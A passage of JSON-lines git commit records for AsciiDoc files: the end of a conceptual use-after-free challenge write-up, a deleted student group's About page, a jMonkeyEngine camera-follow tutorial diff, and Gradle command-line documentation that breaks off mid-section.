(Man\/Woman).\n\nimage::\/images\/blog\/uaf\/main.png[\"The uaf\/cpp main() function\"]\n\nThe switch block is what's interesting to us at the moment.\nWe are prompted with three options:\n\n> [1] Call the *introduce()* method of both the Man and Woman objects.\n\nNotice that both the Man* and Woman* from the *new* keyword are cast to *Human**. Clearly, this objects are in the same class heirarchy, and Human is a common superclass. Further still, notice that we call introduce(), _A function with the same prototype, using two upcasted objects._ Either we are calling the *introduce()* method of the Human class, or there's some as yet unseen polymorphism mechanism that de-obfuscates our function call. 
Running the code, you can see that *Man->introduce()* and *Woman->introduce()* _do not produce the same output for identical calls_, therefore, *they must be virtual functions.*\n\n(This is, of course, extremely obvious because the classes are both defined in this same readable file, but you can still figure out a lot without the class definitions.)\n\n> [3] Delete (and deconstruct) both the Man and Woman objects.\n\nHuh, so we can delete the objects, then use their newly invalidated pointers to call a function.\n\nimage::images\/blog\/uaf\/segfault.png[\"Segfault by accessing a dangling pointer.\"]\n\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b191543fc6b26fbb7b8ef30641009088eacfbb6c","subject":"Delete the file at '_posts\/2017-07-11-the-students-outpost-about2.adoc'","message":"Delete the file at '_posts\/2017-07-11-the-students-outpost-about2.adoc'","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_contents":"","old_contents":"= The Students' Outpost - About\n:published_at: 2017-07-11\n:hp-tags: Students, Outpost, Union\n:hp-alt-title: the students outpost about2\n\nTSO is a group of young people who believe that students should be at the forefront of the emerging nation-wide resistance to Brahminism and fascism. Campuses across the country are in ferment, and it is vital that students politicize and organize to speak truth to power and resist the systematic saffronisation of higher education. We aim to be an open platform that will welcome thinkers, fighters and dreamers of all kinds, as we forge new solidarities and engage critically with questions of our day. The organization shall strive to unite students from across Bangalore in a collective effort that can channel our energies into political action, and in Ambedkar\u2019s words, Educate, Agitate and Organize. Eschewing traditional forms of political organizing, we are in favour of an open, democratic space with no hierarchy (strongly in favour) or institutional affiliation. 
Only continual self-reflection about our positions and our privileges will give us the tools to resist the profoundly unjust system we are complicit in.\nTSO is born out of the hope that this is an ideal that inspires more young people, and that when we come together, it can be the beginning of something truly radical, subversive and fearless.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"56017af6e9e6c09e5a5851a0c9c1893035ff197e","subject":"Update making_the_camera_follow_a_character.adoc","message":"Update making_the_camera_follow_a_character.adoc\n\nFixed broken new lines.\r\nAdded IMPORTANT Admonition.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/making_the_camera_follow_a_character.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/making_the_camera_follow_a_character.adoc","new_contents":"= Making the Camera Follow a 3rd-Person Character\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nWhen players steer a game character with 1st-person view, they directly steer the camera (`flyCam.setEnabled(true);`), and they never see the walking character itself. In a game with 3rd-person view, however, the players see the character walk, and you (the game developer) want to make the camera follow the character around when it walks.\n\nThere are two ways the camera can do that:\n\n* Registering a chase camera to the player and the input manager.\n* Attaching the camera to the character using a camera node.\n\n*Important:* Using third-person view requires you to deactivate the default flyCam (first-person view). This means that you have to configure your own navigation (<<jme3\/advanced\/input_handling#,key inputs and analogListener>>) that makes your player character walk. For moving a physical player character, use `player.setWalkDirection()`; for a non-physical character, you can use `player.move()`.\n\n\n== Code Samples\n\nPress the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java]\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java]\n\n\n== Camera Node\n\nTo make the camera follow a target node, add this camera node code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node.\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/create the camera Node\ncamNode = new CameraNode(\"Camera Node\", cam);\n\/\/This mode means that camera copies the movements of the target:\ncamNode.setControlDir(ControlDirection.SpatialToCamera);\n\/\/Attach the camNode to the target:\ntarget.attachChild(camNode);\n\/\/Move camNode, e.g. behind and above the target:\ncamNode.setLocalTranslation(new Vector3f(0, 5, -5));\n\/\/Rotate the camNode to look at the target:\ncamNode.lookAt(target.getLocalTranslation(), Vector3f.UNIT_Y);\n\n----\n\n[IMPORTANT]\n====\nWhere the example says `camNode.setLocalTranslation(new Vector3f(0, 5, -5));`, you have to supply your own start position for the camera. 
This depends on the size of your target (the player character) and its position in your particular scene. Ideally, you set this to a spot a bit behind and above the target.\n====\n\n[cols=\"2\", options=\"header\"]\n|===\n\na|Methods\na|Description\n\na|setControlDir(ControlDirection.SpatialToCamera)\na|User input steers the target spatial, and the camera follows the spatial. +\nThe spatial's transformation is copied over the camera's transformation. +\nExample: Use with <<jme3\/advanced\/physics#,CharacterControl>>led spatial.\n\na|setControlDir(ControlDirection.CameraToSpatial)\na|User input steers the camera, and the target spatial follows the camera. +\nThe camera's transformation is copied over the spatial's transformation. Use with first-person flyCam.\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java] \u2013 Press the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n\n== Chase Camera\n\nTo activate the chase camera, add the following code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node. You will be able to rotate the target by dragging (keeping the left mouse button pressed and moving the mouse).\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/ Enable a chase cam for this target (typically the player).\nChaseCamera chaseCam = new ChaseCamera(cam, target, inputManager);\nchaseCam.setSmoothMotion(true);\n\n----\n[cols=\"2\", options=\"header\"]\n|===\n\na|Method\na|Description\n\na|setInvertVerticalAxis(true)\na|Invert the camera's vertical rotation Axis \n\na|setInvertHorizontalAxis(true)\na|Invert the camera's horizontal rotation Axis\n\na|setTrailingEnabled(true)\na|Camera follows the target and flies around and behind when the target moves towards the camera. Trailing only works with smooth motion enabled. (Default)\n\na|setTrailingEnabled(false)\na|Camera follows the target, but does not rotate around the target when the target changes direction.\n\na|setSmoothMotion(true)\na|Activate SmoothMotion when trailing. This means the camera seems to accelerate and fly after the character; when it has caught up, it slows down again.\n\na|setSmoothMotion(false)\na|Disable smooth camera motion. Disabling SmoothMotion also disables trailing.\n\na|setLookAtOffset(Vector3f.UNIT_Y.mult(3))\na|Camera looks at a point 3 world units above the target.\n\na|setToggleRotationTrigger(new MouseButtonTrigger(MouseInput.BUTTON_MIDDLE))\na|Enable rotation by keeping the middle mouse button pressed (like in Blender). This disables the rotation on right and left mouse button click.\n\na|setToggleRotationTrigger(new MouseButtonTrigger( +\nMouseInput.BUTTON_MIDDLE), +\nnew KeyTrigger(KeyInput.KEY_SPACE))\na|Activate multiple triggers for the rotation of the camera, e.g. spacebar and middle mouse button, etc.\n\na|setRotationSensitivity(5f)\na|How fast the camera rotates. Use values around <1.0f (all bigger values are ignored).\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java] \u2013 Press the WASD or arrow keys to move. 
Drag with the left mouse button to rotate.\n\n\n== Which to Choose?\n\nWhat is the difference of the two code samples above?\n[cols=\"2\", options=\"header\"]\n|===\n\na|CameraNode\na|ChaseCam\n\na|Camera follows immediately, flies at same speed as target.\na|Camera moves smoothly and accelerates and decelerates, flies more slowly than the target and catches up.\n\na|Camera stays attached to the target at a constant distance.\na|Camera orbits the target and approaches slowly.\n\na|Drag-to-Rotate rotates the target and the camera. You always see the target from behind.\na|Drag-to-Rotate rotates only the camera. You can see the target from various sides.\n\n|===\n","old_contents":"= Making the Camera Follow a 3rd-Person Character\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nWhen players steer a game character with 1st-person view, they directly steer the camera (`flyCam.setEnabled(true);`), and they never see the walking character itself. In a game with 3rd-person view, however, the players see the character walk, and you (the game developer) want to make the camera follow the character around when it walks.\n\nThere are two ways how the camera can do that:\n\n* Registering a chase camera to the player and the input manager.\n* Attaching the camera to the character using a camera node.\n\n*Important:* Using third-person view requires you to deactivate the default flyCam (first-person view). This means that you have to configure your own navigation (<<jme3\/advanced\/input_handling#,key inputs and analogListener>>) that make your player character walk. For moving a physical player character, use `player.setWalkDirection()`, for a non-physical character you can use `player.move()`.\n\n\n== Code Samples\n\nPress the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java]\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java]\n\n\n== Camera Node\n\nTo make the camera follow a target node, add this camera node code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node.\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/create the camera Node\ncamNode = new CameraNode(\"Camera Node\", cam);\n\/\/This mode means that camera copies the movements of the target:\ncamNode.setControlDir(ControlDirection.SpatialToCamera);\n\/\/Attach the camNode to the target:\ntarget.attachChild(camNode);\n\/\/Move camNode, e.g. behind and above the target:\ncamNode.setLocalTranslation(new Vector3f(0, 5, -5));\n\/\/Rotate the camNode to look at the target:\ncamNode.lookAt(target.getLocalTranslation(), Vector3f.UNIT_Y);\n\n----\n\n*Important:* Where the example says `camNode.setLocalTranslation(new Vector3f(0, 5, -5));`, you have to supply your own start position for the camera. This depends on the size of your target (the player character) and its position in your particular scene. 
Optimally, you set this to a spot a bit behind and above the target.\n[cols=\"2\", options=\"header\"]\n|===\n\na|Methods\na|Description\n\na|setControlDir(ControlDirection.SpatialToCamera)\na|User input steers the target spatial, and the camera follows the spatial.+The spatial's transformation is copied over the camera's transformation. +Example: Use with <<jme3\/advanced\/physics#,CharacterControl>>led spatial.\n\na|setControlDir(ControlDirection.CameraToSpatial)\na|User input steers the camera, and the target spatial follows the camera. +The camera's transformation is copied over the spatial's transformation. Use with first-person flyCam.\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java] \u2013 Press the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n\n== Chase Camera\n\nTo activate the chase camera, add the following code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node. You will be able to rotate the target by dragging (keeping the left mouse button pressed and moving the mouse).\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/ Enable a chase cam for this target (typically the player).\nChaseCamera chaseCam = new ChaseCamera(cam, target, inputManager);\nchaseCam.setSmoothMotion(true);\n\n----\n[cols=\"2\", options=\"header\"]\n|===\n\na|Method\na|Description\n\na|setInvertVerticalAxis(true)\na|Invert the camera's vertical rotation Axis \n\na|setInvertHorizontalAxis(true)\na|Invert the camera's horizontal rotation Axis\n\na|setTrailingEnabled(true)\na|Camera follows the target and flies around and behind when the target moves towards the camera. Trailing only works with smooth motion enabled. (Default)\n\na|setTrailingEnabled(false)\na|Camera follows the target, but does not rotate around the target when the target changes direction.\n\na|setSmoothMotion(true)\na|Activate SmoothMotion when trailing. This means the camera seems to accelerate and fly after the character, when it has caught up, it slows down again.\n\na|setSmoothMotion(false)\na|Disable smooth camera motion. Disabling SmoothMotion also disables trailing.\n\na|setLookAtOffset(Vector3f.UNIT_Y.mult(3))\na|Camera looks at a point 3 world units above the target.\n\na|setToggleRotationTrigger(new MouseButtonTrigger(MouseInput.BUTTON_MIDDLE))\na|Enable rotation by keeping the middle mouse button pressed (like in Blender). This disables the rotation on right and left mouse button click.\n\na|setToggleRotationTrigger(new MouseButtonTrigger(+MouseInput.BUTTON_MIDDLE),+new KeyTrigger(KeyInput.KEY_SPACE))\na|Activate mutiple triggers for the rotation of the camera, e.g. spacebar and middle mouse button, etc.\n\na|setRotationSensitivity(5f)\na|How fast the camera rotates. Use values around <1.0f (all bigger values are ignored).\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java] \u2013 Press the WASD or arrow keys to move. 
Drag with the left mouse button to rotate.\n\n\n== Which to Choose?\n\nWhat is the difference of the two code samples above?\n[cols=\"2\", options=\"header\"]\n|===\n\na|CameraNode\na|ChaseCam\n\na|Camera follows immediately, flies at same speed as target.\na|Camera moves smoothly and accelerates and decelerates, flies more slowly than the target and catches up.\n\na|Camera stays attached to the target at a constant distance.\na|Camera orbits the target and approaches slowly.\n\na|Drag-to-Rotate rotates the target and the camera. You always see the target from behind.\na|Drag-to-Rotate rotates only the camera. You can see the target from various sides.\n\n|===\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"90479abb9417144c475d01523af399385026e582","subject":"Move common tasks up in CLI docs","message":"Move common tasks up in CLI docs\n\nFixes gradle\/dotorg-docs#155\n\nSigned-off-by: Eric Wendelin <96f164ad4d9b2b0dacf8ebee2bb1eeb3aa69adf1@gradle.com>\n","repos":"lsmaira\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,lsmaira\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,lsmaira\/gradle,gradle\/gradle,lsmaira\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,robinverduijn\/gradle,lsmaira\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/commandLineInterface.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/commandLineInterface.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n== Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] 
[--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<test_filtering,`--tests` for Java test filtering>>.\n\n[[sec:command_line_executing_tasks]]\n=== Executing tasks\n\nYou can run a task and all of its dependencies.\n----\n\u276f gradle myTask\n----\n\nYou can learn about what projects and tasks are available in the <<sec:command_line_project_reporting, project reporting section>>.\n\n==== Executing tasks in multi-project builds\nIn a <<intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name. The following are equivalent _when run from the root project_.\n\n----\n\u276f gradle :mySubproject:taskName\n\u276f gradle mySubproject:taskName\n----\n\nYou can also run a task for all subprojects using the task name only. For example, this will run the \"test\" task for all subprojects when invoked from the root project directory.\n\n----\n\u276f gradle test\n----\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n\n----\n\u276f cd mySubproject\n\u276f gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n==== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `compile` and `test` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n\u276f gradle compile test\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n==== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n++++\n<figure>\n <title>Example Task Graph<\/title>\n <imageobject>\n <imagedata fileref=\"img\/commandLineTutorialTasks.png\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n++++\n<sample id=\"excludeTask\" dir=\"userguide\/tutorial\/excludeTasks\" title=\"Excluding tasks\">\n <output args=\"dist --exclude-task test\"\/>\n<\/sample>\n++++\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. 
Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n==== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n\u276f gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n==== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n\u276f gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n=== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n==== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n\u276f gradle build\n----\n\n==== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n\u276f gradle run\n----\n\n==== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n\u276f gradle check\n----\n\n==== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n\u276f gradle clean\n----\n\n[[sec:command_line_completion]]\n=== Command-Line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n++++\n<figure>\n <title>Gradle Completion<\/title>\n <imageobject>\n <imagedata fileref=\"img\/gradle-completion-4.0.gif\"\/>\n <\/imageobject>\n<\/figure>\n++++\n\n[[sec:command_line_debugging]]\n=== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). 
See also <<sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n=== Performance options\nTry these options when optimizing build performance. Learn more about https:\/\/guides.gradle.org\/performance\/[improving performance of Gradle builds here].\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, please see <<sec:parallel_execution>>. _Default is off_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage:img\/gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n==== Gradle daemon options\nYou can manage the <<gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if it is not running, or if the existing daemon is busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n=== Logging options\n\n==== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.
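\n\nThe `-D` forms above can equally be set in `gradle.properties` so they apply to every invocation. For example, one possible combination (property names as listed above and in the <<sec:gradle_configuration_properties, configuring build environment guide>>):\n\n----\n# gradle.properties in the project root or in GRADLE_USER_HOME\norg.gradle.caching=true\norg.gradle.parallel=true\norg.gradle.logging.level=info\norg.gradle.jvmargs=-Xmx2g\n----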
\n\n==== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. The different modes are described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like `rich`, but also output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n==== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nThere're <number> deprecation warnings, which may break the build in Gradle 5.0. Please run with --warning-mode=all to see them.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,none,summary)`::\nSpecify warning mode via <<sec:gradle_properties, Gradle properties>>. The different modes are described immediately below.\n\n`--warning-mode=(all,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n==== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::img\/rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Logs above grouped by task that generated them\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n\n[[sec:command_line_execution_options]]\n=== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<cache_command_line_options,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<cache_command_line_options, dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which tasks would have executed.\n\n[[sec:command_line_bootstrapping_projects]]\n=== Bootstrapping new projects\n\n==== Creating new Gradle builds\nUse the built-in `gradle init` task to create new Gradle builds, with new or existing projects.\n\n----\n\u276f gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. 
See <<build_init_plugin, init plugin documentation>> for details.\n\n----\n\u276f gradle init --type java-library\n----\n\n==== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n\u276f gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper,Gradle wrapper section>>.\n\n=== Environment options\nYou can customize where build scripts, settings, caches, and so on are located through the options below. Learn more about customizing your <<build_environment, build environment>>.\n\n`-b`, `--build-file`::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`, then `myProjectName.gradle`.\n\n`-c`, `--settings-file`::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-u`, `--no-search-upward` (deprecated)::\nDon't search in parent directories for a `settings.gradle` file.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<sec:gradle_system_properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<sec:project_properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_project_reporting]]\n=== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n==== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n\u276f gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/guides.gradle.org\/creating-build-scans\/[creating build scans].\n\n==== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n\u276f gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. 
